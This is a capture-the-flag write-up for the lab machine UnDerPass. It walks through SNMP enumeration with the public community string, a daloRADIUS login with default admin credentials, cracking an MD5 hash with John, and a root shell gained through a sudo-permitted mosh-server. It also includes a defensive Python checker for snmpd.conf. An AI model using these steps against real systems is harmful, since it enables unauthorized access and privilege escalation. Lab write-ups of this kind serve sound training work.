Introduction

OS: Linux
Difficulty: Easy
Points: 20
Release: 22 Dec 2024
IP: 10.10.11.48

🕵️ Enumeration & Initial Access

🔍 Nmap Scan

PORT   STATE SERVICE REASON  VERSION
22/tcp open ssh syn-ack OpenSSH 8.9p1 Ubuntu 3ubuntu0.10 (Ubuntu Linux; protocol 2.0)
80/tcp open http syn-ack Apache httpd 2.4.52 ((Ubuntu))
  • 22 – SSH
  • 80 – Apache Web Server (default page)

🌐 Web Enumeration

Tried directory brute-forcing and subdomain enumeration, but didn’t find anything of interest.

gobuster dir -u http://10.10.11.48/ -w /usr/share/dirbuster/wordlists/directory-list-2.3-medium.txt -t 50

No useful directories discovered.


📡 SNMP Enumeration

I ran another Nmap scan targeting UDP ports and discovered SNMP was enabled:

PORT    STATE SERVICE VERSION
161/udp open snmp SNMPv1 server; net-snmp SNMPv3 server (public)

Nmap output also indicated the hostname: UnDerPass.htb


Used snmpbulkwalk to extract additional details:

snmpbulkwalk -c public -v2c 10.10.11.48 .

Output (relevant):

iso.3.6.1.2.1.1.4.0 = STRING: "steve@underpass.htb"
iso.3.6.1.2.1.1.5.0 = STRING: "UnDerPass.htb is the only daloradius server in the basin!"
iso.3.6.1.2.1.1.6.0 = STRING: "Nevada, U.S.A. but not Vegas"

Found the username: steve@underpass.htb and a hint that the site runs daloRADIUS.
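
A defender-side check for the exposure seen in that walk, as an added example that is not part of the original write-up: it audits a net-snmp snmpd.conf for default community strings, communities usable from any source, v1/v2c write access, and account-like addresses in the system group. The sample config is constructed (only the sysContact and sysName strings are quoted from the output above), and audit_snmpd_conf is a hypothetical helper name.

```python
import re

DEFAULT_COMMUNITIES = {"public", "private"}       # well-known default strings
OPEN_SOURCES = {"default", "0.0.0.0/0", "::/0"}   # sources that match any client
COMMUNITY_DIRECTIVES = {"rocommunity", "rwcommunity", "rocommunity6", "rwcommunity6"}
SYSTEM_DIRECTIVES = {"syscontact", "sysname", "syslocation"}  # OIDs 1.3.6.1.2.1.1.4-6
EMAIL = re.compile(r"[\w.+-]+@[\w-]+(\.[\w-]+)+")

# Constructed sample config for illustration; not read from the target host.
SAMPLE_CONF = """\
rocommunity public
rwcommunity s3cr3t-Str1ng 10.0.0.5
com2sec notConfigUser default public
sysContact steve@underpass.htb
sysName UnDerPass.htb is the only daloradius server in the basin!
"""

def audit_snmpd_conf(text):
    """Return (line_number, issue) tuples for risky snmpd.conf directives."""
    findings = []
    for n, raw in enumerate(text.splitlines(), 1):
        parts = raw.split("#", 1)[0].split()      # drop comments, tokenize
        if not parts:
            continue
        directive, args = parts[0].lower(), parts[1:]
        if directive in SYSTEM_DIRECTIVES:
            if EMAIL.search(" ".join(args)):
                findings.append((n, "account-like address exposed via " + parts[0]))
            continue
        if directive in COMMUNITY_DIRECTIVES and args:
            # rocommunity COMMUNITY [SOURCE [OID | -V VIEW]]
            community = args[0]
            source = args[1] if len(args) > 1 else "default"
        elif directive == "com2sec" and len(args) >= 3:
            # com2sec [-Cn CONTEXT] SECNAME SOURCE COMMUNITY
            source, community = args[-2], args[-1]
        else:
            continue
        if community.lower() in DEFAULT_COMMUNITIES:
            findings.append((n, "default community string"))
        if source.lower() in OPEN_SOURCES:
            findings.append((n, "community usable from any source address"))
        if directive.startswith("rw"):
            findings.append((n, "write access over SNMPv1/v2c"))
    return findings

if __name__ == "__main__":
    for line_no, issue in audit_snmpd_conf(SAMPLE_CONF):
        print(f"line {line_no}: {issue}")
```

The email pattern only catches address-shaped values; free-text hints such as the sysName string above still need a manual review of what the system group publishes.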


User Flag

Direct access to /daloradius/ resulted in a 403 Forbidden. But accessing the login page directly worked:

http://underpass.htb/daloradius/app/operators

I tried the default credentials from the daloRADIUS GitHub page:

  • Username: administrator
  • Password: radius

Login successful!

Inside the admin panel, I found:

  • Username: svcMosh
  • Hash: 412DD4759978ACFCC81DEAB01B382403


Cracked the hash using John:

john hash --wordlist=/mnt/f/ctf/wordlists/rockyou.txt --format=Raw-MD5
Using default input encoding: UTF-8
Loaded 1 password hash (Raw-MD5 [MD5 512/512 AVX512BW 16x3])
Warning: no OpenMP support for this hash type, consider --fork=8
Press 'q' or Ctrl-C to abort, almost any other key for status
underwaterfriends (svcMosh)
1g 0:00:00:01 DONE (2025-05-09 16:28) 0.6849g/s 2044Kp/s 2044Kc/s 2044KC/s undiamassinverte..underarrest
Use the "--show --format=Raw-MD5" options to display all of the cracked passwords reliably
Session completed.

Logged in via SSH:

ssh svcMosh@UnDerPass.htb
svcMosh@underpass.htb's password:

svcMosh@underpass:~$ cat user.txt
4ccca47fa068cc44dd1eecxxxxxxxxxxx

✅ Logged in successfully and obtained the user flag.


🚀 Root Flag

Discovered that svcMosh can run mosh-server with sudo:

Reference: https://github.com/mobile-shell/mosh

svcMosh@underpass:~$ sudo /usr/bin/mosh-server


MOSH CONNECT 60001 FwF7QVKV1oqn9+pXWixPxg

mosh-server (mosh 1.3.2) [build mosh 1.3.2]
Copyright 2012 Keith Winstein <mosh-devel@mit.edu>
License GPLv3+: GNU GPL version 3 or later <http://gnu.org/licenses/gpl.html>.
This is free software: you are free to change and redistribute it.
There is NO WARRANTY, to the extent permitted by law.

[mosh-server detached, pid = 41245]

Used mosh-client to connect locally:

svcMosh@underpass:~$ mosh-client 127.0.0.1 60001
MOSH_KEY environment variable not found.

Set the environment variable and reconnect: https://manpages.debian.org/unstable/mosh/mosh-client.1.en.html

MOSH_KEY=FwF7QVKV1oqn9+pXWixPxg mosh-client 127.0.0.1 60001

Got a root shell!

Welcome to Ubuntu 22.04.5 LTS (GNU/Linux 5.15.0-126-generic x86_64)

* Documentation: https://help.ubuntu.com
* Management: https://landscape.canonical.com
* Support: https://ubuntu.com/pro

System information as of Fri May 9 10:36:10 AM UTC 2025

System load: 0.0 Processes: 226
Usage of /: 58.7% of 6.56GB Users logged in: 0
Memory usage: 18% IPv4 address for eth0: 10.10.11.48
Swap usage: 0%


Expanded Security Maintenance for Applications is not enabled.

0 updates can be applied immediately.

Enable ESM Apps to receive additional future security updates.
See https://ubuntu.com/esm or run: sudo pro status


The list of available updates is more than a week old.
To check for new updates run: sudo apt update
Failed to connect to https://changelogs.ubuntu.com/meta-release-lts. Check your Internet connection or proxy settings



root@underpass:~# cat /root/root.txt
d4780713174c58bc514a408xxxxxxxxx
root@underpass:~#

🎉 Got the root flag!